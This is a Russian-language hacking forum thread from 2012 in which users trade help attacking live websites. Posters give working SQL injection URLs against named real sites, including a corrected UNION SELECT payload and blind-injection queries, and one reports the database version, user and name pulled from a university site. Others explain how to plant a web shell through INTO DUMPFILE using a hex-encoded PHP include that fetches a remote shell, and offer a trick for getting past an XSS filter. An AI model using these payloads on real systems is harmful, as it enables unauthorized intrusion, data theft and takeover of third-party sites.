Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    ну так в чем проблема то? в отключенных я не вижу фун-ии eval
     
    _________________________
  2. Dr.Strangelove

    Joined:
    1 Dec 2008
    Messages:
    111
    Likes Received:
    61
    Reputations:
    -6
    http://www.umoncton.ca/nouvelles/info.php?id=8297-2

    http://www.umoncton.ca/nouvelles/info.php?id=8297+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39

    Здесь была классическая sql-inj , но некоторое время назад произошли какие-то изменения и скуля не работает как раньше. Не могу въехать что конкретно за изменения произошли. Кто может разобраться в чем дело? Ну и конечно как это дело обойти?
     
    #20622 Dr.Strangelove, 22 Jun 2012
    Last edited: 22 Jun 2012
  3. RuDefc0n

    RuDefc0n Member

    Joined:
    2 Jun 2012
    Messages:
    33
    Likes Received:
    8
    Reputations:
    0
    Собственно нид хелп...
    Кручу один сайтец.
    Собственно там mysql blind

    Вот такими запросами вытащил имя базы/имя юзверя.
    3183' /*!30000and ascii(substring((database()),7,1))=97 and*/ 'x'='x

    А теперь вопрос:
    3183' /*!30000and Length((select distinct schema_name from `information_schema`.schemata limit 0,1))<60 and*/ 'x'='x

    отказывается отрабатывать.
    ЧЯДНТ? Помогите, пожалуйста)
     
    #20623 RuDefc0n, 22 Jun 2012
    Last edited: 22 Jun 2012
  4. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    to RuDefc0n
    Code:
    length(select schema_name from information_schema.schemata limit 0,1)<32 and*/ 'x'='x
    И зачем нужен был DISTINCT или ты думаешь есть БД с одинаковыми названиями?
     
  5. RuDefc0n

    RuDefc0n Member

    Joined:
    2 Jun 2012
    Messages:
    33
    Likes Received:
    8
    Reputations:
    0
    Исключительно "на всякий случай" проверил.
    Пробовал я и так - не катит -_-
     
  6. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    to Dr.Strangelove
    Все отлично работает -
    Version: 5.5.20
    User: php_read@
    Database: nouvelles
     
  7. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    А какая версия Мускула в вашем случае, позвольте полюбопытствовать? Вы уверены, что она, версия, больше или равна 5-ой?
     
  8. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    to Га-Ноцри
    Там версия 5.0.92, только вот у пользователя нет доступа к information_schema, в этом то вся и загвоздка была! :)
     
  9. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    Ясно :) Ну я так, на всякий случай спросил :) Просто иногда бывает тяжело искать темную кошку в темной комнате, особенно если ее там нет :)
     
  10. .Varius

    .Varius Elder - Старейшина

    Joined:
    5 May 2009
    Messages:
    558
    Likes Received:
    289
    Reputations:
    42
    а.)запрос не зафолсен
    б.)комментарий не поставлен

    синтаксически верный запрос

    Code:
    http://www.umoncton.ca/nouvelles/info.php?id=8297+[b]and+0[/b]+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39[b]%23[/b]
    
     
    1 person likes this.
  11. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    Не могу разобраться с заливкой веб-шелла через MySQL inj.
    Вот пример:
    В первом выделенном фрагменте я указал текст, во втором я указал УНИКАЛЬНЫЙ путь до файла. Почему он мне выдает ошибку синтаксиса SQL?
     
  12. Dr.Strangelove

    Joined:
    1 Dec 2008
    Messages:
    111
    Likes Received:
    61
    Reputations:
    -6
    Ты так не зальешь шелл. Путь к файлу надо указывать не в hex'е. Только так, например into outfile '/var/www/site.com/shell.php'
     
    1 person likes this.
  13. t3cHn0iD

    t3cHn0iD Banned

    Joined:
    6 Apr 2009
    Messages:
    313
    Likes Received:
    63
    Reputations:
    66
    Потому что, как написал уже товарищ выше, строку, а здесь конкретно содержащую полный путь на сервере, нужно заключить в одинарные или двойные кавычки (согласно доку по мускулю), если же они фильтруются, то искать другие способы заливки.Грубо говоря, путь нужно в запросе передавать напрямую, а не в каком-либо ином виде.
     
    #20633 t3cHn0iD, 23 Jun 2012
    Last edited: 23 Jun 2012
  14. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    Спасибо t3cHn0iD,Dr.Strangelove!
    А чуть не забыл, еще вопрос: в ФАКЕ об заливке через mysql inj, написан вот такой пример:
    Мне не понятно именно этот момент, зачем здесь указывать имя БД? Это вообще обязательно? Вот например SQL inj:
    Данная конструкция будет работать, или же сначала нужно через information_schema вытащить БД?
     
  15. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    в mysql 3 нужно было указывать базу
     
  16. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    Del msg
     
    #20636 Zed0x, 23 Jun 2012
    Last edited: 13 Jan 2014
  17. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    можно ли обойти такую xss фильтрацию?
    $interzis = array(";", '"', "<", ">", "=", "'", "script", "?php", "%>", "INSERT", "UPDATE", "DROP");
    $replace = array("");
     
  18. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    код самого шела переведи в хекс, в итоге у тебя место
    <?php include "http://www.site.com/shell.php"?> должно быть 0x3c3f70687020696e636c7564652022687474703a2f2f7777772e736974652e636f6d2f7368656c6c2e706870223f3e
    Пример:
    PHP:
    http://imgenex.com/view_data_page.php?id=1-1+UNION+SELECT+null,0x3c3f70687020696e636c7564652022687474703a2f2f7777772e736974652e636f6d2f7368656c6c2e706870223f3e,null,null,null,null,null+into+dumpfile+'/tmp/25aa.php'+--+
     
    _________________________
  19. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    to RazyKK
    Можно <scrscript>ipt>, оставит <script> ну и в том же духе, я думаю вектор понятен?
     
    1 person likes this.
  20. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    cat1vo угловые скобки то выр6жутся
     
Thread Status:
Not open for further replies.